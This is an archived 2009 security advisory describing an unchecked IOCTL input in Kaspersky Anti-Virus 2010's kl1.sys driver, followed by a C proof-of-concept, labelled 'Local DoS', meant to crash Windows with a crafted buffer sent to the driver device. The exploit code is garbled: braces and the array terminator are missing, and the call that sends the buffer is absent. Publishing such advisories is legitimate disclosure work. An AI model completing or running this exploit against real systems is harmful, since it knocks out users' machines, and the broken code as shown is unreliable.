[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Kaspersky Anti-Virus 2010 <= pointer dereference vulnerability

Program          : Kaspersky Anti-Virus 2010
Homepage         : http://www.kaspersky.com
Discovery        : 2009/09/29
Author Contacted : 2009/10/01
Patch Updated    : 2009/11/16
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@xxxxxxxxxxxx

//----- Application description

The most trusted virus and spyware protection - premium protection 
against viruses, spyware, Trojans, worms, bots and more. Also includes 
comprehensive phishing and identity theft defense and superfast performance.

//----- Description of vulnerability

kl1.sys driver don't check inputs address of an IOCTL. An exception can be 
thrown if we modify one or two DWORDs.
With my test I can't do best exploitation than a BSOD.

//----- Credits


s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings



#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

int __cdecl main(int argc, char* argv[])
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a,
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961,
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9,
    BYTE Out[0x20];
    printf("Local DoS - Kaspersky 2010\n\n");
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    printf("Sploit Send.\nhDevice = %x\n", hDevice);
    return 0;